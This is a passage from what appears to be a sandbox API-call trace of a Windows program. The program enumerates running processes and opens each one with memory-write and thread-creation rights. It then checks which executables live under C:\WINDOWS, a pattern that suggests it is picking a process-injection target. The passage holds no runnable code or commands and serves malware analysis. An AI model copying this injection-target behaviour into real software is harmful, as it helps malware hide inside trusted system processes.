lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0090.799] GetCurrentProcessId () returned 0xf00 [0090.799] GetCurrentProcess () returned 0xffffffff [0090.799] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.799] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x140) returned 0x0 [0090.799] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0090.799] GetCurrentProcessId () returned 0xf00 [0090.799] GetCurrentProcess () returned 0xffffffff [0090.799] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.799] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x198) returned 0x0 [0090.799] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0090.800] GetCurrentProcessId () returned 0xf00 [0090.800] GetCurrentProcess () returned 0xffffffff [0090.800] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.800] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0090.800] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0090.800] GetCurrentProcessId () returned 0xf00 [0090.800] GetCurrentProcess () returned 0xffffffff [0090.800] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.800] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0090.800] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0090.801] GetCurrentProcessId () returned 0xf00 [0090.801] GetCurrentProcess () returned 0xffffffff [0090.801] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.801] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x220) returned 0x0 [0090.801] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0090.801] GetCurrentProcessId () returned 0xf00 [0090.801] GetCurrentProcess () returned 0xffffffff [0090.801] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.801] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0090.801] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0090.802] GetCurrentProcessId () returned 0xf00 [0090.802] GetCurrentProcess () returned 0xffffffff [0090.802] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.802] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x244) returned 0x0 [0090.802] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0090.802] GetCurrentProcessId () returned 0xf00 [0090.802] GetCurrentProcess () returned 0xffffffff [0090.802] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.802] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2a4) returned 0x0 [0090.803] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0090.803] GetCurrentProcessId () returned 0xf00 [0090.803] GetCurrentProcess () returned 0xffffffff [0090.803] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.803] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0090.803] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0090.804] GetCurrentProcessId () returned 0xf00 [0090.804] GetCurrentProcess () returned 0xffffffff [0090.804] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.804] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2b4) returned 0x0 [0090.804] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0090.804] GetCurrentProcessId () returned 0xf00 [0090.804] GetCurrentProcess () returned 0xffffffff [0090.804] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.804] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0090.804] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0090.805] GetCurrentProcessId () returned 0xf00 [0090.805] GetCurrentProcess () returned 0xffffffff [0090.805] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.805] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0090.805] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5f, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0090.805] GetCurrentProcessId () returned 0xf00 [0090.805] GetCurrentProcess () returned 0xffffffff [0090.805] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.805] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0090.805] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0090.806] GetCurrentProcessId () returned 0xf00 [0090.806] GetCurrentProcess () returned 0xffffffff [0090.806] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.806] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0 [0090.806] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0090.806] GetCurrentProcessId () returned 0xf00 [0090.806] GetCurrentProcess () returned 0xffffffff [0090.806] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.806] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3d8) returned 0x0 [0090.807] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0090.807] GetCurrentProcessId () returned 0xf00 [0090.807] GetCurrentProcess () returned 0xffffffff [0090.807] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.807] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0090.807] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0090.807] GetCurrentProcessId () returned 0xf00 [0090.808] GetCurrentProcess () returned 0xffffffff [0090.808] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.808] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x350) returned 0x0 [0090.808] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0090.808] GetCurrentProcessId () returned 0xf00 [0090.808] GetCurrentProcess () returned 0xffffffff [0090.808] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.808] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x434) returned 0x0 [0090.808] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0090.809] GetCurrentProcessId () returned 0xf00 [0090.809] GetCurrentProcess () returned 0xffffffff [0090.809] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.809] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x554) returned 0x0 [0090.809] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0090.809] GetCurrentProcessId () returned 0xf00 [0090.809] GetCurrentProcess () returned 0xffffffff [0090.809] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.809] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x590) returned 0x0 [0090.810] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0090.810] GetCurrentProcessId () returned 0xf00 [0090.810] GetCurrentProcess () returned 0xffffffff [0090.810] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.810] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x598) returned 0x0 [0090.810] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0090.811] GetCurrentProcessId () returned 0xf00 [0090.811] GetCurrentProcess () returned 0xffffffff [0090.811] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.811] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x5b0) returned 0x0 [0090.811] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0090.811] GetCurrentProcessId () returned 0xf00 [0090.811] GetCurrentProcess () returned 0xffffffff [0090.811] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.811] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x5e8) returned 0x0 [0090.811] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0090.812] GetCurrentProcessId () returned 0xf00 [0090.812] GetCurrentProcess () returned 0xffffffff [0090.812] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.812] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x69c) returned 0x0 [0090.812] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0090.814] GetCurrentProcessId () returned 0xf00 [0090.814] GetCurrentProcess () returned 0xffffffff [0090.814] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.814] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x6bc) returned 0x0 [0090.814] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0090.815] GetCurrentProcessId () returned 0xf00 [0090.815] GetCurrentProcess () returned 0xffffffff [0090.815] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.815] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x708) returned 0x45c [0090.815] GetModuleFileNameExW (in: hProcess=0x45c, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\sihost.exe" (normalized: "c:\\windows\\system32\\sihost.exe")) returned 0x1e [0090.815] StrStrIW (lpFirst="C:\\Windows\\System32\\sihost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\sihost.exe" [0090.815] CloseHandle (hObject=0x45c) returned 1 [0090.815] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0090.816] GetCurrentProcessId () returned 0xf00 [0090.816] GetCurrentProcess () returned 0xffffffff [0090.816] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.816] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x720) returned 0x45c [0090.816] GetModuleFileNameExW (in: hProcess=0x45c, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0090.816] StrStrIW (lpFirst="C:\\Windows\\System32\\svchost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\svchost.exe" [0090.816] CloseHandle (hObject=0x45c) returned 1 [0090.816] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0090.817] GetCurrentProcessId () returned 0xf00 [0090.817] GetCurrentProcess () returned 0xffffffff [0090.817] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.817] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x7a0) returned 0x45c [0090.817] GetModuleFileNameExW (in: hProcess=0x45c, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0090.817] StrStrIW (lpFirst="C:\\Windows\\System32\\taskhostw.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\taskhostw.exe" [0090.817] CloseHandle (hObject=0x45c) returned 1 [0090.817] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0090.817] GetCurrentProcessId () returned 0xf00 [0090.817] GetCurrentProcess () returned 0xffffffff [0090.817] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.817] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0090.818] GetCurrentProcessId () returned 0xf00 [0090.818] GetCurrentProcess () returned 0xffffffff [0090.818] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.818] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x818) returned 0x0 [0090.818] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0090.818] GetCurrentProcessId () returned 0xf00 [0090.818] GetCurrentProcess () returned 0xffffffff [0090.819] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.819] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x84c) returned 0x0 [0090.819] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0090.819] GetCurrentProcessId () returned 0xf00 [0090.819] GetCurrentProcess () returned 0xffffffff [0090.819] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.819] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x8a0) returned 0x0 [0090.819] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0090.820] GetCurrentProcessId () returned 0xf00 [0090.820] GetCurrentProcess () returned 0xffffffff [0090.820] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.820] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xb3c) returned 0x45c [0090.820] GetModuleFileNameExW (in: hProcess=0x45c, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" (normalized: "c:\\windows\\systemapps\\shellexperiencehost_cw5n1h2txyewy\\shellexperiencehost.exe")) returned 0x4f [0090.820] StrStrIW (lpFirst="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" [0090.820] CloseHandle (hObject=0x45c) returned 1 [0090.820] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | 